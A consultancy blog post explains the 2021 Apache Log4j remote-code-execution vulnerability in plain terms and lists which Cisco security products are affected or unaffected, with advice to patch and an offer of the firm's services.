Most vendors use open source libraries which are the spinning wheel of modern day technology. We share and reuse well settled solutions and libraries of proven research. The science says “nothing is perfect, but we strive to make it less wrong”. In our networking/software case we say that we need a patch.
As we in AFS deal predominately with network security, we will outline below the vulnerable products and the patches that you need to apply (if you are the administrator) for one major NetSec/Firewall vendor – Cisco Systems.
What is Log4j:
Apache Log4j is a Java-based logging utility. It is part of the Apache Logging Services, a project of the Apache Software Foundation. Log4j is one of several Java logging frameworks. It is vastly used in thousands of software products on the market today.
What is vulnerable:
“In Apache Log4j2 versions up to and including 2.14.1 (excluding security release 2.12.2), the JNDI features used in configurations, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.”
Speaking in more plain language, an attacker can instruct the system to download and subsequently execute a malicious payload by submitting a specially crafted request to a vulnerable system.
What makes it worse is that after the public release of the PoC (Proof of Concept) of the exploit, everybody in the business realized it is in fact an easy exploit. Another thing to mention is the fact that Java is so widely spread and used within our products, making the identification, validation for vulnerability and patching an extremely time-consuming process, while the majority of internet baddies can fastly scan and execute the ready exploit.
Cisco products affected by Log4j
Cisco published a list of affected by Log4j security devices – the most critical vulnerability of 2021.
AFS is here to help you evaluate your security posture and help you efficiently plan and patch the critical parts of your security infrastructure.
List of vulnerable Cisco security products:
If you use the products below, you need to apply the patch ASAP.
- Cisco Firepower Threat Defense (FTD) managed by Firepower Device Manager (FDM)
- Cisco Identity Services Engine (ISE)
If you use the products below, you can skip the patching.
NOT vulnerable Cisco Network and Content Security Devices:
- Cisco AMP Virtual Private Cloud Appliance
- Cisco Adaptive Security Appliance (ASA) Software
- Cisco Adaptive Security Device Manager
- Cisco Adaptive Security Virtual Appliance (ASAv)
- Cisco Advanced Web Security Reporting Application
- Cisco Email Security Appliance (ESA)
- Cisco FXOS Firepower Chassis Manager
- Cisco Firepower Management Center
- Cisco Firepower Next-Generation Intrusion Prevention System (NGIPS)
- Cisco Firepower Threat Defense (FTD) managed by Cisco Firepower Management Center
- Cisco Secure Email and Web Manager, formerly Cisco Content Security Management Appliance (SMA)
- Cisco Secure Network Analytics, formerly Stealthwatch
- Cisco Secure Services Proxy (CSSP)
- Cisco Security Malware Analytics Appliance, formerly Cisco Threat Grid Appliance
- Cisco Security Manager
- Cisco Web Security Appliance (WSA)
My network is affected, how do I patch?
Ask your managed services provider to do it, or contact a consultancy company.
Conclusion:
It is not a straightforward and easy process to be properly informed for all security vulnerabilities, to know what to patch, when to patch and how to react each time a new one comes out (which is in fact quite often these days).
AFS team is here to help, this is our expertise and we will be happy to help anyone seeking consultation, advice, quick check, or patching. Just contact us!
Reference links:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd
https://logging.apache.org/log4j/2.x/security.html